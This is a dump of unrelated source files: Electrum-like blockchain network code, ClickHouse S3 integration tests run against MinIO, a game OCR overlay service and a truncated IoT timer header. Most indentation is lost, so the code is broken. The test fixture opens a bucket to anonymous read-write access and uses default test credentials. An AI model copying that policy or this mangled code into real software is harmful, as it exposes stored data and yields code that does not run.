# # open(filename, 'wb+').close()
# b = self.blockchains[0]
# with b.lock: b.update_size()
# self.downloading_headers = False
# self.downloading_headers = True
# t = threading.Thread(target = download_thread)
# t.daemon = True
# t.start()
def run(self):
# self.init_headers_file()
#
# while self.is_running() and self.downloading_headers:
# time.sleep(1)
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header):
height = header.get('block_height')
if not height:
return
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
b = blockchain.check_header(header)
if b:
interface.blockchain = b
self.switch_lagging_interface()
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
self.notify('updated')
return
tip = max([x.height() for x in self.blockchains.values()])
        if tip >= 0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.request_header(interface, 0)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain == b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
self.blockchain().update_size()
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise BaseException('Server did not answer')
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
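    # Minimal usage sketch (assumes a running, connected Network instance and a
    # server speaking the standard Electrum protocol):
    #
    #   banner = network.synchronous_get(('server.banner', []))
    #   fee = network.synchronous_get(('blockchain.estimatefee', [2]))
    #
    # Any other (method, params) pair understood by the server works the same way.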
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './_instances/dummy/configs/config.d/defaultS3.xml')
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
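# The policy above opens the main bucket to anonymous read/write, while the
# "<bucket>-with-auth" bucket gets no policy at all, so the tests that pass
# explicit (or wrong) credentials exercise real credential handling.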
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test putting no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
        assert False, "Query should fail."
except helpers.client.QueryRuntimeException as e:
        assert str(e).find("The specified key does not exist") != -1
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
pytest.param("''", id="1_argument"),
pytest.param("'','','','','',''", id="6_arguments"),
])
def test_wrong_s3_syntax(started_cluster, s3_storage_args):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
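    # Spread the 1001 inserts across ~30 worker threads, each handling `nights_per_job` files.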
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
for attempt in range(10):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == 9:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
    with open(CONFIG_PATH, 'r') as config:
        config_lines = config.readlines()
    config_lines = [line.replace(old, new) for line in config_lines]
    with open(CONFIG_PATH, 'w') as config:
        config.writelines(config_lines)
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["565"]
def test_storage_s3_get_unstable(started_cluster):
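    # resolver:8081 runs the unstable_server.py mock, which presumably simulates an
    # unreliable S3 endpoint; the query must still return the complete result.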
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500000,500000"]
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
|
game_service.py
|
from abc import ABC, abstractmethod
import threading
import pytesseract
from PIL import ImageGrab
import cv2
from imposters_mark.services.screen_service import ScreenService
from imposters_mark.entities.stats import Stats
from imposters_mark.entities.player import Player
class _PytesseractHelper(object):
def __init__(self, pytesseract_cmd: str):
pytesseract.pytesseract.tesseract_cmd = pytesseract_cmd
# noinspection PyMethodMayBeStatic
def frame_to_string(self, bbox=None) -> str:
frame = ImageGrab.grab(bbox)
string = pytesseract.image_to_string(frame)
return string.strip()
# noinspection PyMethodMayBeStatic
def frame_to_data(self, bbox=None) -> list:
frame = ImageGrab.grab(bbox)
content = pytesseract.image_to_data(frame)
lines = content.splitlines()[1:]
data = []
for line in lines:
line_data = line.split()
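            # image_to_data() returns tab-separated rows with 12 columns; when the
            # recognized text is empty, a plain whitespace split yields only 11
            # tokens, so such rows are skipped here.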
if len(line_data) == 11:
continue
data.append({
'level': line_data[0],
'page_num': line_data[1],
'block_num': line_data[2],
'par_num': line_data[3],
'line_num': line_data[4],
'word_num': line_data[5],
'left': line_data[6],
'top': line_data[7],
'width': line_data[8],
'height': line_data[9],
'conf': line_data[10],
'text': line_data[11]})
return data
class IGameService(ABC):
@abstractmethod
def update(self):
pass
class GameService(IGameService):
def __init__(self, screen_service: ScreenService, pytesseract_cmd: str):
self.screen_service = screen_service
self.pytesseract_helper = _PytesseractHelper(pytesseract_cmd)
self.stats = Stats()
def update(self):
frame = self.screen_service.get_frame()
update_location = threading.Thread(target=self.__update_location, args=(frame,))
update_location.start()
update_players = threading.Thread(target=self.__update_players)
update_players.start()
self.__update_thread_count_text(frame)
self.__update_location_text(frame, 3)
self.__update_current_location_text(frame)
self.__update_players_text(frame, 3)
self.__update_players_rect(frame)
return frame
def __update_location(self, frame):
self.stats.thread_count += 1
frame_height, frame_width, _ = frame.shape
bbox = (
int(frame_width / 4),
frame_height - 100,
int(frame_width / 2 + frame_width / 4),
frame_height - 25)
location = self.pytesseract_helper.frame_to_string(bbox=bbox)
self.stats.append_location(location)
self.stats.thread_count -= 1
def __update_thread_count_text(self, frame):
frame_height, frame_width, _ = frame.shape
thread_count = f'Active Threads: {str(self.stats.thread_count)}'
position = (10, frame_height - 10)
font = cv2.QT_FONT_NORMAL
font_scale = 1
font_color = (0, 0, 255)
font_thickness = 3
cv2.putText(frame, thread_count, position, font, font_scale, font_color, font_thickness)
def __update_location_text(self, frame, count: int):
frame_height, frame_width, _ = frame.shape
location = f'Locations: {self.stats.get_last_locations(count)}'
position = (10, frame_height - 60)
font = cv2.QT_FONT_NORMAL
font_scale = 1
font_color = (0, 0, 255)
font_thickness = 3
cv2.putText(frame, location, position, font, font_scale, font_color, font_thickness)
def __update_current_location_text(self, frame):
frame_height, frame_width, _ = frame.shape
current_location = f'Current Location: {self.stats.get_current_location()}'
position = (10, frame_height - 110)
font = cv2.QT_FONT_NORMAL
font_scale = 1
font_color = (0, 0, 255)
font_thickness = 3
cv2.putText(frame, current_location, position, font, font_scale, font_color, font_thickness)
def __update_players(self):
self.stats.thread_count += 1
data = self.pytesseract_helper.frame_to_data()
for entry in data:
player = Player()
player.name = entry['text']
player.position = (
int(entry['left']),
int(entry['top']),
int(entry['width']),
int(entry['height']))
self.stats.append_player(player)
self.stats.thread_count -= 1
def __update_players_text(self, frame, count: int):
frame_height, frame_width, _ = frame.shape
players = f'Players Observed: {self.stats.get_last_players(count)}'
position = (10, frame_height - 170)
font = cv2.QT_FONT_NORMAL
font_scale = 1
font_color = (0, 0, 255)
font_thickness = 3
cv2.putText(frame, players, position, font, font_scale, font_color, font_thickness)
def __update_players_rect(self, frame):
players_positions = self.stats.get_players_position()
for player_position in players_positions:
left = player_position[0]
top = player_position[1]
width = player_position[2]
height = player_position[3]
cv2.rectangle(frame, (left, top), (left + width, top + height), (0, 0, 255), 2)
|
Timer_rai.py
|
# Copyright (C) 2020 by ZestIOT. All rights reserved. The information in this
# document is the property of ZestIOT. Except as specifically authorized in
# writing by ZestIOT, the receiver of this document shall keep the information
# contained herein confidential and shall protect the same in whole or in part from
# disclosure and dissemination to third parties. Disclosure and disseminations to
# the receiver's employees shall only be made on a strict need to know basis.
"""
timer function
Input: algo(which event is being considered Person in ROI, view direction, motion of the person),
flag(if the event is true in the particular frame or not), cam(cv2 camera feed object)
variables: Pdetect(it increments when flag is true in the frame),Pcheck(flag to start buffer time when flag is False),
Ptimer(flag to start Actual Alert timer),Pst_time(start time for buffer time),Ptrigger(start time for Alert Timer).
Palert_frame(number of false positives to be considered before resetting the Timer),
